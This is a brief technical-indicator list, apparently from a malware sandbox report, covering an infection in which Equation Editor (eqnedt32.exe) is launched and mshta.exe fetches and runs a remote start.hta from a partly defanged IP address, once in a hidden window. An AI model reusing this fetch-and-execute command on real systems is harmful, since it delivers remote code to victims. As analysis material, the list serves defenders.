Technical Information
- '%WINDIR%\syswow64\mshta.exe' http://31.#1.68.86/start.hta &AAAAAAAAC
- '31.#1.68.86':80
- '%WINDIR%\syswow64\mshta.exe' http://31.#1.68.86/start.hta &AAAAAAAAC' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding